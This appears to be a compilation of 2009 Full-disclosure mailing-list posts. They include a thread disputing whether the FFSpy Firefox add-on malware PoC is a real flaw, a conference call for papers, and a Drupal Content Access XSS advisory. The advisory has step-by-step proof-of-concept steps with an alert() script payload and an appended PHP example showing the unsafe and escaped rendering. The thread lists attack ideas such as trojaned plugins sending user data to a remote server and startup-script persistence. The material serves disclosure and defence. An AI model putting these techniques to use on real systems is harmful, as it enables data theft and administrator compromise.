1. Modify a vim, emacs, KDE, GNOME, etc. plugin that the user uses so that it sends the user's personal content (data, files, commands executed, etc.) from the system to a remote server.

2. Put a malicious executable file or script in the user's home directory and execute it from start-up scripts (.bashrc, .bash_profile, etc.) so that the malicious executable file executes whenever the user logs in. Now this malicious file can send the user's personal content to a remote server.

3. Modify or put plugins for other software to do malicious stuff. Similar to point 1.

4. Override PATH settings, aliases, put scripts, etc. so that 'ls' now executes 'rm' or some other malicious command, so that the user ends up executing commands he did not intend to.

5. ... and much more ...

>> From the POC it seems that somehow the attacker has to gain physical access to the system or do some social engineering attack to fool the user into installing or modifying his existing plugins. The PoC does not explain how this is done.
>
> Do you know the download-and-execute payload for exploits? Make an application that changes the files, then use that payload in some exploit. People just want everything done. Just click, download, use, and call themselves l33ts.

How is it any different from the attack scenarios I have explained in the case of vim, emacs, KDE, GNOME, Linux shell, etc.?

> Maybe this is nothing new, but I think that the way to do it is new. Because you don't install anything, and the point to be proven here is that the Firefox add-on system is security flawed from the very beginning.

So, are you saying vim, emacs and the plugin system of every other software on the earth is security flawed from the very beginning?
[Full-disclosure] Addendum : [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)
For those that failed to reproduce, try naming the POC file with an XHTML extension.
Re: [Full-disclosure] FFSpy, a firefox malware PoC
ok

On Tue, May 26, 2009 at 4:08 PM, Shell Code technobus...@gmail.com wrote:
> [Shell Code's reply, reproduced in full above, quoted here verbatim in the original message]
Re: [Full-disclosure] FFSpy, a firefox malware PoC
ok

On Tue, May 26, 2009 at 4:30 PM, David Blanc davidblanc1...@gmail.com wrote:
> On Tue, May 26, 2009 at 8:38 PM, Shell Code technobus...@gmail.com wrote:
>> [Shell Code's reply, reproduced in full above, quoted here verbatim in the original message]
>
> I believe saphex or the author of the so-called PoC, Duarte Silva, do not understand the concept of privileges and security vulnerabilities. By the way, are saphex and Duarte Silva two different persons or saphex == Duarte Silva?
>
> Coming back to the topic of privileges, any Firefox addon runs in the context of the user running the browser. So, the addon can do whatever the user running the browser can. The same holds true for plugins of other software too, as Shell Code has correctly explained. For example, an emacs plugin can do whatever the user running emacs can. So, if saphex or Duarte Silva argues that this is a security flaw in the Firefox addon mechanism, they will also argue that this is a security flaw in emacs, Windows, Eclipse and every other OS and software. Such an argument, without any doubt, is lame and stupid, as most people trained in computer security would agree.
>
> --
> Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. - by Albert Einstein.
[Full-disclosure] [IMF 2009] 3rd Call - Deadline Extended
Dear all,

the deadline for the submission of papers has been extended. Accepted papers will be published in IEEE Computer Society's Conference Proceedings Series and be available in the IEEE online Digital Library. Please excuse possible cross-postings.

3rd CALL FOR PAPERS

IMF 2009
5th International Conference on IT Security Incident Management & IT Forensics
September 15th - 17th, 2009
Stuttgart, Germany

DEADLINE EXTENSION PAPER SUBMISSION

The deadline for paper submissions has been extended to June 8th, 2009. Notification of acceptance will be sent on June 22nd. Camera ready paper copies must be submitted until June 26th, 2009.

Papers can be submitted via the page found at:
http://www.imf-conference.org/imf2009/submission.html

Accepted papers will be published in IEEE Computer Society's Conference Proceedings Series and be available in the IEEE online Digital Library.

CONFERENCE BACKGROUND

Information and communication technology is more and more becoming an integral and in most cases even a vital part of life. The worldwide economy, public administration, health care, education and even personal life depend on working IT. Constriction of the availability of its service, loss of confidentiality or alteration of data processed, or loss of integrity of the IT infrastructure usually lead to serious or disastrous consequences. Hence security plays an increasingly important role for operators and users of IT systems and infrastructures.

The establishment of static security measures like policies, standards, and guidelines slowly but steadily is getting more common amongst IT operators. Nevertheless, in the vast majority of cases operators do not have the capability to detect and respond to security incidents or do a forensic analysis of their traces that can be used in a lawsuit. Jurisdiction in most countries is starting to change and applies regulations on legal duty to maintain safety on operators of IT. Hence incident response capabilities become indispensable to avoid successful assertion of claims for damages caused by compromised or misused systems.

CONFERENCE GOALS

IMF's intent is to gather experts from throughout the world in order to present and discuss recent technical and methodical advances in the fields of IT security incident response and management and IT forensics. The conference provides a platform for collaboration and exchange of ideas between industry, academia, law-enforcement and other government bodies.

CONFERENCE TOPICS

The scope of IMF 2009 is broad and includes, but is not limited to, the following areas:

IT Incident Response
* Procedures and Methods of Incident Response
* Formats and Standardization for Incident Response
* Tools Supporting Incident Response
* Incident Analysis
* CERTs/CSIRTs
* Sources of Information, Information Exchange, Communities
* Dealing with Vulnerabilities (Vulnerability Response)
* Monitoring and Early Warning
* Education and Training
* Organizations
* Legal Aspects (Jurisdiction, Applicable Laws and Regulations)

IT Forensics
* Trends and Challenges in IT Forensics
* Techniques, Tools and Procedures in IT Forensics
* Methods for the Gathering, Handling, Processing and Analysis of Digital Evidence
* Evidence Protection in IT Environments
* Standardization in IT Forensics
* Education and Training
* Organizations
* Legal Aspects (Jurisdiction, Applicable Laws and Regulations)

Submission Details

IMF invites the submission of full papers of up to 20 pages, presenting novel and mature research results, as well as practice papers of up to 20 pages, describing best practices, case studies or lessons learned. Proposals for workshops, discussion and presentation on practical methods and challenges are also welcome. All submissions must be written in English (see below), and either in postscript or PDF format. Authors of accepted papers must ensure that their papers will be presented at the conference.

Submitted full papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal or a conference with proceedings. All submissions will be reviewed by the program committee and papers accepted to be presented at the conference will be included in the conference proceedings.

Papers can be submitted via the page found at:
http://www.imf-conference.org/imf2009/submission.html

Details on the electronic submission procedure as well as detailed registration information and formatting instructions are provided on the conference web site (http://www.imf-conference.org).
[Full-disclosure] Drupal 6 Content Access Module XSS
Details of this disclosure have been posted at http://lampsecurity.org/drupal_6_content_access_xss

Vendor Notified: 05/19/2009

Description of Vulnerability:
Drupal (http://drupal.org) is a robust content management system (CMS) written in PHP and MySQL that provides extensibility through hundreds of third party modules. The Content Access Module (http://drupal.org/project/content_access) suffers from a cross site scripting vulnerability because it does not sanitize role names before displaying them on the 'Access Control' screen of managed content types. This vulnerability is exacerbated by the fact that Drupal 6.12 core does not perform input validation on role names as they are being created. This can lead to a situation where users administering role based access controls of content types could be exposed to malicious HTML content.

Systems affected:
Drupal 6.12 with Content Access 6.x-1.1 was tested and shown to be vulnerable.

Impact:
Authenticated users could be exposed to XSS attacks when administering content access. Users with this responsibility are generally site administrators. Cross site scripting attacks against administrators could lead to full web server process compromise.

Mitigating factors:
In order to carry out the exploit described below the attacker must be able to inject malicious content into role names, which is possible for authenticated users with the 'administer permissions' permission. Other attack vectors may exist that do not require these restricted permissions.

Proof of concept:
1. Install Drupal 6.12 and Content Access 6.x-1.1
2. Click Administer - User management - Roles
3. Enter <script>alert('xss');</script> in the Name textarea
4. Click the Add Role button
5. Observe JavaScript alert
6. Click on Administer - Content Types
7. Click on 'edit' next to any content type
8. Click on 'Access control' link
9. Observe the JavaScript alert multiple times

Vendor Response:
Drupal security was notified of this vulnerability on 5/19/2009. Vendor has declined to issue an official security announcement due to the restricted access rights required to carry out the proof of concept exploit. Vendor has filed a bug with the module maintainer at http://drupal.org/node/472494.

--
Justin C. Klein Keane
http://www.MadIrish.net
http://LAMPSecurity.org
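The two gaps the advisory names (no output escaping in the module, no input validation in core) map to two checks. The following is an added illustration written for this page, not the Content Access module's or Drupal's own code: it assumes Drupal 6's check_plain() (emulated with htmlspecialchars() when run outside Drupal), a constructed role list shaped like user_roles() output, and an assumed allowed-character pattern for role names.

```php
<?php
// Added illustration for the Content Access XSS above; not the module's code.
// Drupal 6's check_plain() is the standard output-escaping call. When this
// file is run outside Drupal we fall back to the same htmlspecialchars()
// behaviour so the script is self-contained.
if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
  }
}

// Constructed sample, shaped like Drupal 6's user_roles() output (rid => name).
// Role 3 carries the advisory's PoC payload as an account holding
// 'administer permissions' could have created it.
$roles = array(
  1 => 'anonymous user',
  2 => 'authenticated user',
  3 => "<script>alert('xss');</script>",
);

// Vulnerable pattern: the role name is dropped into markup verbatim, so the
// browser parses the payload as a script element on the access-control page.
function render_role_row_unsafe($rid, $name) {
  return '<tr><td><input type="checkbox" name="roles[' . (int) $rid . ']"></td>'
       . '<td>' . $name . '</td></tr>';
}

// Fixed pattern: escape at the output boundary. The same string is now shown
// as literal text ("&lt;script&gt;...") instead of being parsed as HTML.
function render_role_row_safe($rid, $name) {
  return '<tr><td><input type="checkbox" name="roles[' . (int) $rid . ']"></td>'
       . '<td>' . check_plain($name) . '</td></tr>';
}

// Defense in depth for the core-side gap the advisory mentions: validate role
// names at creation time. The allowed character set is an assumption for this
// example (Drupal 6.12 core applied no such check); it rejects markup outright.
function role_name_is_valid($name) {
  return (bool) preg_match('/^[\p{L}\p{N} _.\-]{1,64}$/u', $name);
}

foreach ($roles as $rid => $name) {
  printf("rid %d valid=%s\n  unsafe: %s\n  safe:   %s\n",
         $rid,
         role_name_is_valid($name) ? 'yes' : 'no',
         render_role_row_unsafe($rid, $name),
         render_role_row_safe($rid, $name));
}
```

Only the escaped row contains no raw angle brackets for role 3, which is the property a regression test for the fixed module should assert on the 'Access control' page.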